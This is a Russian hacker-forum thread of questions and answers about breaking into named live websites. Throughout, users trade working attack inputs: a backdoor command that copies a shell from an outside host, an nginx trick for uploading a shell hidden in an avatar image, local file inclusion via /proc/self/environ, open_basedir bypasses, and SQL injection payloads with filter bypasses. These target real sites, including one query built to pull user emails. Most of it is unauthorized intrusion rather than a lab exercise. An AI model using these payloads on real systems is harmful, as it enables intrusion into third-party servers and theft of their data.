я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить
запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)


php include

mod_

вероятнее там ссылка открывается в iframe а не инклуд и тп, разберись, попробуй подключить php файлы

Konqi

абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь))

ладно попробую.только узнаю как это делается для начала

mod_ said:
Konqi
абсолютно прав.ссылка открывается в iframe.складывается такое ощущение что ты знаешь о каком сайте идет речь))
ладно попробую.только узнаю как это делается для начала


Ну вот самый примитивный пример frame.

_ttp://www.prodisney.ru/index.php?page=http://rambler.ru

Это ну никак нельзя перепутать с RFI

Как обойти open_basedir? сколько не пробывал не получается)


Code:
Server software: Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr
Disabled PHP Functions: none
Open base dir: /home/lc/data:.
cURL support: enabled
Supported databases: MySql (5.0.67), MSSQL, PostgreSQL

Readable /etc/passwd: no
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl
Danger: ipfw
Downloaders: wget, fetch, lynx, curl, lwp-mirror

kacergei said:
Как обойти open_basedir? сколько не пробывал не получается)

Code:
Server software: Apache/2.2.9 (FreeBSD) PHP/5.2.8 mod_ssl/2.2.9 OpenSSL/0.9.7e-p1
Loaded Apache modules: core, prefork, http_core, mod_so, mod_authn_file, mod_authz_host, mod_authz_user, mod_auth_basic, mod_include, mod_log_config, mod_logio, mod_env, mod_mime_magic, mod_expires, mod_headers, mod_setenvif, mod_ssl, mod_mime, mod_autoindex, mod_suexec, mod_cgi, mod_dir, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_php5, mod_rpaf-2, mod_ispmgr
Disabled PHP Functions: none
Open base dir: /home/lc/data:.
cURL support: enabled
Supported databases: MySql (5.0.67), MSSQL, PostgreSQL

Readable /etc/passwd: no
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate, suidperl
Danger: ipfw
Downloaders: wget, fetch, lynx, curl, lwp-mirror



Попробуй тут (https://rdot.org/forum/showpost.php?p=17487) посмотреть

"Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."

BigBear said:
Попробуй
тут (https://rdot.org/forum/showpost.php?p=17487)
посмотреть
"Листинг директории за пределами open_basedir за счет разного ответа функций "linkinfo" и "realpath" на существующий и несуществующий файл."


Да сработало, создал файл с

-------

P.S> OxoTnik спасибо, но уже сделал по другому))

kacergei said:
Да сработало, создал файл с
Но как теперь загрузить нормальный shell?


скрипт_где_бекдор.php?cmd=phpinfo() ; тут посмотри пути до скрипта

скрипт_где_бекдор.php?cmd=copy("http://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");

kacergei said:
Да сработало, создал файл с




OxoTnik said:
скрипт_где_бекдор.php?cmd=
phpinfo();
тут посмотри пути до скрипта
скрипт_где_бекдор.php?cmd=
copy("http://сайт_с_шелом.com/shell.txt","путь_к_корню_скрипта/2.php");


http://owap.so/images/676406.jpg

последние 3 поста оставлю на память потомкам

Прошу остальных модераторов не удалять сие посты =)

BigBear said:

последние 3 поста оставлю на память потомкам
Прошу остальных модераторов не удалять сие посты =)



)) *Улыбнуло*

Возник еще вопрос, пытаюсь заархивировать получаю:

$ tar cjf /tmp/site.tar.bz2 /usr/local/psa/home/vhosts/site.ru/ 2>&1

/libexec/ld-elf.so.1: /usr/local/lib/liblzma.so.5: version XZ_5.0 required by /usr/lib/libarchive.so.5 not defined


Code:
Server software: Apache/2.0.63 (Unix) PHP/5.2.8
Loaded Apache modules: core, prefork, http_core, mod_so, mod_access, mod_auth, mod_auth_anon, mod_auth_dbm, mod_charset_lite, mod_include, mod_deflate, mod_log_config, mod_env, mod_mime_magic, mod_cern_meta, mod_expires, mod_headers, mod_usertrack, mod_unique_id, mod_setenvif, mod_mime, mod_status, mod_autoindex, mod_asis, mod_info, mod_cgi, mod_vhost_alias, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_speling, mod_userdir, mod_alias, mod_rewrite, mod_suexec, mod_php5, mod_rpaf-2
Disabled PHP Functions: none
Safe mode exec dir: /nonexec
cURL support: enabled
Supported databases: MySql (4.1.25)

Readable /etc/passwd: yes [view]
Readable /etc/shadow: no

Userful: gcc, cc, ld, make, php, perl, python, ruby, tar, gzip, bzip2, nc, locate
Danger: clamd, ipfw, snort
Downloaders: wget, fetch, lynx, links, curl, lwp-mirror

Проблема в том, что функция архивирования не найдена (не установлена)

Для решения проблемы тебе нужны права root для выполнения операций chroot и /etc/rc.d/ldconfig start

З.Ы. Могу ошибаться

BigBear said:
Проблема в том, что функция архивирования не найдена (не установлена)
Для решения проблемы тебе нужны права root для выполнения операций chroot и /etc/rc.d/ldconfig start
З.Ы. Могу ошибаться


Какие есть еще варианты что бы заархивировать, а не качать по одному файлу?

kacergei said:
Какие есть еще варианты что бы заархивировать, а не качать по одному файлу?


Web-Shell PAS (https://rdot.org/forum/showthread.php?t=1567) архивирует данные на лету в zip-формат.

Попробуй, вдруг поможет.

BigBear said:
Web-Shell PAS (https://rdot.org/forum/showthread.php?t=1567)
архивирует данные на лету в zip-формат.
Попробуй, вдруг поможет.


Пробывал, но есть одна проблема он иногда папку в которой 2 текстовых документа по несколько кб. он скачивает как 10-300 мб, и показывает битый архив

Значит не так скачиваешь. Поднимайся на директорию выше. Указываешь галочкой папку, что собираешься скачать. Жмёшь Download. Попробуй.

BigBear said:
Ну вот самый примитивный пример frame.
_ttp://www.prodisney.ru/index.php?page=http://rambler.ru
Это ну никак нельзя перепутать с RFI


там и сам инклюд не прячется, рядом:

page=article_menu.php?menu_item=/blabla

\xe8\xf1\xef\xee\xeb\xfc\xe7\xf3\xe5\xec+SOCKS+78. 93.54.249:1080;+\xce\xd8\xc8\xc1\xca\xc0+\xd1\xc5\ xd0\xc2\xc5\xd0\xc0+(SOCKS+87.236.210.78:1080);+GE T-\xf2\xe0\xe9\xec\xe0\xf3\xf2\xee\xe2+1;+\xe8\xf1\x ef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed\xfb+\xe4\xe0\xe d\xed\xfb\xe5+\xf1\xe8\xf1\xf2\xe5\xec\xfb+\xf1\xe 0\xec\xee\xee\xe1\xf3\xf7\xe5\xed\xe8\xff;+\xe7\xe 0\xe2\xe5\xf0\xf8\xe5\xed\xee+\xef\xf0\xe8+\xef\xe e\xef\xfb\xf2\xea\xe5+\xe2\xf5\xee\xe4\xe0;+Result :+\xe8\xf1\xef\xee\xeb\xfc\xe7\xf3\xe5\xec+SOCKS+5 8.211.195.86:80;+\xce\xd8\xc8\xc1\xca\xc0+\xd1\xc5 \xd0\xc2\xc5\xd0\xc0+(SOCKS+119.161.161.188:1080); +\xe8\xf1\xef\xee\xeb\xfc\xe7\xee\xe2\xe0\xed\xfb+ \xe4\xe0\xed\xed\xfb\xe5+\xf1\xe8\xf1\xf2\xe5\xec\ xfb+\xf1\xe0\xec\xee\xee\xe1\xf3\xf7\xe5\xed\xe8\x ff;+\xef\xe8\xea\xf2\xee\xea\xee\xe4+\xe4\xe5\xf8\ xe8\xf4\xf0\xee\xe2\xe0\xed;+\xe7\xe0\xf0\xe5\xe3\ xe8\xf1\xf2\xf0\xe8\xf0\xee\xe2\xe0\xeb\xe8\xf1\xf c;+\xe2\xee\xf8\xeb\xe8;+\xe2\xee\xe7\xec\xee\xe6\ xed\xee,+\xf0\xe5\xe3\xe8\xf1\xf2\xf0\xe0\xf6\xe8\ xff+\xed\xe5+\xf3\xe4\xe0\xeb\xe0\xf1\xfc+(\xe2\xf b\xf1\xeb\xe0\xed+\xea\xee\xe4+\xe0\xea\xf2\xe8\xe 2\xe0\xf6\xe8\xe8+/+\xe8\xf1\


как это дешифровать? --- дешифровал)


используем SOCKS 78.93.54.249:1080; ОШИБКА СЕРВЕРА (SOCKS 87.236.210.78:1080); GET-таймаутов 1; использованы данные системы самообучения; завершено при попытке входа; RESULT: используем SOCKS 58.211.195.86:80; ОШИБКА СЕРВЕРА (SOCKS 119.161.161.188:1080); использованы данные системы самообучения; пиктокод дешифрован; зарегистрировались; вошли; возможно, регистрация не удалась (выслан код активации / ис


ток что это значит хз)

А в чём собственно вопрос ?

BigBear said:
А в чём собственно вопрос ?


ну форуме в логах засветилась шифрованная шляпа...я запостил вопрос - как дешифровать, потом сам дешифровал)

Как залить шелл?

Версия Xoops XOOPS 2.0.18.2

Есть админка к форуму forum.simix.ru, как можно загнать шелл?

залил шелл на сайт, открываю его а мне пишет


Fatal error: Uncaught exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (upload)' in /home/ххх/domains/library/Zend/Controller/Dispatcher/Standard.php:241 Stack trace: #0 /home/ххх/domains/library/Zend/Controller/Front.php(934): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #1 /home/ххх/domains//public_html/index.php(320): Zend_Controller_Front->dispatch() #2 {main} thrown in /home/ххх/domains/library/Zend/Controller/Dispatcher/Standard.php on line 241


чё ет за бред и что в таком случае можно сделать?

eclipse92 said:
Есть админка к форуму forum.simix.ru, как можно загнать шелл?


Да тут можно залить шелл без админки, через ngnix http://forum.simix.ru/favicon.ico/.php вот тут бага

создаёшь профиль на форуме заливаешь этот аватар


Code:
http://www.sendspace.com/file/f6xbz8

и открываешь ссылку на картинку site.ru/papka/photo.gif и дописываешь /.php Т.е site.ru/papka/photo.gif/.php

seozone said:
Да тут можно залить шелл без админки, через ngnix http://forum.simix.ru/favicon.ico/.php вот тут бага
создаёшь профиль на форуме заливаешь этот аватар

Code:
http://www.sendspace.com/file/f6xbz8

и открываешь ссылку на картинку site.ru/papka/photo.gif и дописываешь /.php Т.е site.ru/papka/photo.gif/.php


а чё ето за бага такая, с чем ето связано?

qaz читай и комменты http://habrahabr.ru/post/100961/

qaz said:
а чё ето за бага такая, с чем ето связано?


Сейчас эта уязвимость не очень актуальная, вот года 2 назад чуть-ли не 5-10% сайтов были уязвимы, а на данный момент единицы.

Также можно юзать багу не только через картинку, но и хоть через .avi, flv, mp3 и т.д

Подскажите возможно ли залить shell на сайт через php include.Только начал изучать,ничего не получаеться.

http://www.prodisney.ru/index.php?page=robots.txt

Sat-hacker said:
Подскажите возможно ли залить shell на сайт через php include.Только начал изучать,ничего не получаеться.
http://www.prodisney.ru/index.php?page=robots.txt


На твоем примере возможно!, там есть форум, регестрируешься, заливаешь аватар с шелкодом, инклудишь аватар и выполняется шелл!

З.Ы: Учитесь пользоваться поиском по форуму, тут есть ответы на все вопросы новичков!


статьи по PHP инклудам:
php injection - /thread12123.html
Автор GreenBear
TRUE PHP-injection - /thread23501.html
Автор Zadoxlik
PHP-include и способы защиты - /thread91807.html
Автор _Pantera_
[новый способ] замена нулл-байту в инклудах - /thread98525.html
Автор [Raz0r]
Логи и конфиги
Default *log, *conf files locations - /thread49775.html

winstrool said:
На твоем примере возможно!, там есть форум, регестрируешься, заливаешь аватар с шелкодом, инклудишь аватар и выполняется шелл!



Можете подробней как в аватар добавить shellcod и как проинклудить? Спасибо.

Я б с удовольствием пользовался но хз ошибку пишет,никаких прокси не использую.

POST requests from foreign hosts are not allowed.

Для того чтоб постить на форуме необходимо разрещить referrer для нашего форума.

Referrer заблокирован у Вас либо firewill, либо в opera или firefox

Блокировка сделана для безопасности пользователей форума.

winstrool said:
На твоем примере возможно!, там есть форум, регестрируешься, заливаешь аватар с шелкодом, инклудишь аватар и выполняется шелл!
З.Ы: Учитесь пользоваться поиском по форуму, тут есть ответы на все вопросы новичков!


Ты такой хакер


PHP:

Sat-hacker said:
Можете подробней как в аватар добавить shellcod и как проинклудить?
Спасибо.


Вот держи архив, там картинки в форматах .gif,png,jpg

http://www.sendspace.com/file/xe1r2f

seozone said:
Да тут можно залить шелл без админки, через ngnix http://forum.simix.ru/favicon.ico/.php вот тут бага
создаёшь профиль на форуме заливаешь этот аватар

Code:
http://www.sendspace.com/file/f6xbz8

и открываешь ссылку на картинку site.ru/papka/photo.gif и дописываешь /.php Т.е site.ru/papka/photo.gif/.php


Спасибо, а что с правами делать? ну всмысле, тут не всё правится

Ребят, а попробовать самим все поискать, разве сложно? Устроили тут чат какой-то...

to eclipse92 Для Вас отдельная тема существует!

Повышение прав [задай вопрос - получи ответ] (https://antichat.live/threads/296327/)

Нет скули


?view=searched&search=1
'
&page=5&id=1


Есть скуля


?view=searched&search=
'
1&page=5&id=1


ответ


Query failed : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1


На запросы


?view=searched&search=1
+order+by+123--
+&page=5&id=1
и
?view=searched&search=1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='
1&page=5&id=1


нет никакой реакций

что ещё попробовать можно?

to OxoTnik

У Вас инъекция в SELECT * FROM table_name WHERE column_name = 'bla_bla' LIMIT [SQLINJ]-10,10

Думая здесь ничего не поможет!

OxoTnik said:
что ещё попробовать можно?


?view=searched&search=-10,10+union+select+x+--+&page=5&id=1

http://kvostava.us/modules/boonex/poll/index.php?aModule=

Вроде LFI, но ничего не получается.

Задание по SQL inj

В универе дали задание раскрутить скули всего 10 тасков, не получается решить последний там time-based и просто форма, помогите пожалуйста https://alexbers.com/sql/lastlevel10.php

full_hate said:
В универе дали задание раскрутить скули всего 10 тасков, не получается решить последний там time-based и просто форма, помогите пожалуйста https://alexbers.com/sql/lastlevel10.php




Code:
if ((substring((@@version),1,1)=5),sleep(0),sleep(3))

Дальше запрос сам составишь?)

MaxFast said:
http://kvostava.us/modules/boonex/poll/index.php?aModule=
Вроде LFI, но ничего не получается.


Кто сказал, что LFI? Внимательно читаем ерроры и варнинги. Во первых, судя по тому, что при подстановке в GET запрос переменной из ошибки вида - http://kvostava.us/modules/boonex/poll/index.php?aModule не дает никакой реакции. Вывод - либо определяется локально в скриптах, либо в реквесте используется другая переменная , а в скриптах переопределяется на $aModule. В любом случае, неопределенная константа BX_DIRECTORY_PATH_MODULES - в пути к файлу не даст провести операцию. Более того, require_once(BX_DIRECTORY_PATH_MODULESclasses/View.php) явно повествует о том, что вследствии того , что она самая константа неопределена - скрипт не может подключить - константа/classes/View.php. Явно, что модуль, коим данный файл и является, использует константы и прочие данные определенные уровнем выше.

Code:
_ttp://www.localtoolbox.com/corporate/index.php ?cat_id=-9 3+union+select+1,2,3,4,5,6,7,8,9,10, 11--+

Вроде всё верно делаю, а вот принтабильные поля никак не могу увидеть.

GhostW said:

Code:
_ttp://www.localtoolbox.com/corporate/index.php ?cat_id=-9 3+union+select+1,2,3,4,5,6,7,8,9,10, 11--+

Вроде всё верно делаю, а вот принтабильные поля никак не могу увидеть.


http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+select+1,2,3,version(),5,6,7,8,9,0,11--+

Skofield said:
http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+select+1,2,3,version(),5,6,7,8,9,0,11--+


странно, вроде как пробовал и так, но никакого результата... спасибо огромное. Очень оперативно отозвались

seozone said:
Вот держи архив, там картинки в форматах .gif,png,jpg
http://www.sendspace.com/file/xe1r2f



Там аватары до 20 кб только грузить можна.

Если нет вывода ошибки sql injection а сама sql присутствует как узнать сколько таблиц и т.д?

Sat-hacker said:
Если нет вывода ошибки sql injection а сама sql присутствует как узнать сколько таблиц и т.д?


зачем тебе вывод ошибки если нужно узнать количество таблиц? Оо

если имеется ввиду количество колонок то

order by, group by

контент страницы должно менятся если запрос возвращает false

Какая-то странная инъекция ...

http://www.glhf.ru/index.php?option=com_seyret&Itemid=105&catid=-1+union+select+0x313233--

в LFI в запросах фильтруется как обойти?

фильтрацию прошел проинклудил proc/self/environ

php код просто написан и почему то не выполняется

RazyKK said:
в LFI в запросах фильтруется как обойти?
фильтрацию прошел проинклудил proc/self/environ
php код просто написан и почему то не выполняется


зачем тебе "

да там не include а file_get_contents. фильтруется etc , как можно обойти?

RazyKK said:
да там не include а file_get_contents. фильтруется etc , как можно обойти?


что именно фильтруется? никогда не встречал такого чтоб фильтрировался слово "etc", если /etc/passwd, то попробуй /etc/какаятофигня/../passwd

etc/любое слово - ошибка

RazyKK said:
etc/любое слово - ошибка


ну поэксперементируй с кодированием, с хексом и тп

попрубуй понять логику WAF. а сначала обясни зачем тебе нужен каталог /etc/ ?

хекс попробовал, 0x...... не работает. конфиги посмотреть. нашел пасс от дб, пробовал удаленно подкл к sql не успешно

Народ, как правильно заэкранировать хвост запроса в MySQL? так /* не получается, и так -- или так # тоже, хотя в запрос они и попадают, но парсер всё равно выполняет всё что идёт за ними... И пишет You have an error in your SQL syntax

Запрос такой:


Code:
select * from (SELECT sector_id,sector_name , (select count(*) from tbl_jobs
where status_cd='sENAB' and position_sector=s.sector_id and education_level=9; /* )
job_count FROM tbl_sectors s where lang_cd='RUS' order by order_id)a where a.job_count>0

попробуй #

RazyKK

лучше скрипты изучи

postscripter

ссылку скинь, гадалки уже спят

Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать

Решётка тоже не прокатила. К сожалению...


Code:
POST /rabota_01.php HTTP/1.1
Host: www.karyera.kz
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 SF/2.09b
Range: bytes=0-399999
Referer: http://www.karyera.kz/
Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&

В урле слова типа Select фильтруются, поэтому только через post.

postscripter said:
Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать
Решётка тоже не прокатила. К сожалению...

Code:
POST /rabota_01.php HTTP/1.1
Host: www.karyera.kz
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 SF/2.09b
Range: bytes=0-399999
Referer: http://www.karyera.kz/
Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&

В урле слова типа Select фильтруются, поэтому только через post.


http://candidate.karyera.kz/search_01.php

POST / p_Keyword='or(ExtractValue(1,concat(0x3a,version() )))='1

http://screenshotuploader.com/i/01/SIke6Ij.png

Konqi, благодарствую, счас погляжу

Хм, но update или delete таким способом всё равно не сделать нельзя....... вроде близко бутерброд, а не укусишь)

Пробовал через скрипт регистрации пользователей, там емейл экранируется только апострофами. Но! Cначала делается select, а только потом запись... и валится на select-е, а не на записи...

Только изучаю SQL Inj. Создал на локалке уязвимый php


PHP:
Новость №".$line['id']."
";

}

exit;

}

$query="SELECT text FROM news WHERE id=".$_GET['id'];

$result=mysql_query($query);

print"";

while ($line=mysql_fetch_array($result,MY SQL_ASSOC)) {

print"";

foreach ($lineas$col_value) {

print"$col_value";

}

print"";

}

print"";

mysql_free_result($result);

mysql_close($link);



?>



При запросе http://localhost/mynews.php?id=1' вылетает скуля.

Ради интереса сделал такой запрос http://localhost/mynews.php?id=1; SELECT text FROM news WHERE id=2

В результате облом, хотя если сделать запрос через консоль SELECT text FROM news WHERE id=1; SELECT text FROM news WHERE id=2; то все ок. В чем проблема?

mysql_query не поддерживает мультизапросы


mysql_query() посылает один запрос
(посылка нескольких запросов не поддерживается)
активной базе данных сервера, на который ссылается переданный дескриптор link_identifier.

Подскажите, есть способы обхода такой вот защиты от инжектирования?

http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1

http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person

postscripter said:
Подскажите, есть способы обхода такой вот защиты от инжектирования?
http://www.karyera.kz/article_01.php?p_ArticleID=19%20or%201=1
http://www.karyera.kz/article_01.php?p_ArticleID=19 and 0 union select null,null,null,null,email,null from tbl_person


http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union(select+1 ,email,3,4,5,6+/*!from*/+tbl_person)--+

Konqi said:
http://www.karyera.kz/article_01.php?p_ArticleID=19+and+0+union(
select+1,email,3,4,5,6
+/*!from*/+tbl_person)--+


А почему в данном случае select не попадает под фильтр?

WendM said:
А почему в данном случае select не попадает под фильтр?


потому что ваф фильтрует связку "union+select"

http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-

'.html

Не могу раскрутить. Помогите плиз

WendM said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g-
'.html
Не могу раскрутить. Помогите плиз


http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html

Konqi said:
http://www.southdevonchillifarm.co.uk/shop/dried-bhut-jolokia-naga-jolokia-imported-10g'or(ExtractValue(1,concat(0x3a,version())))='1. html


А что делает функция ExtractValue () ?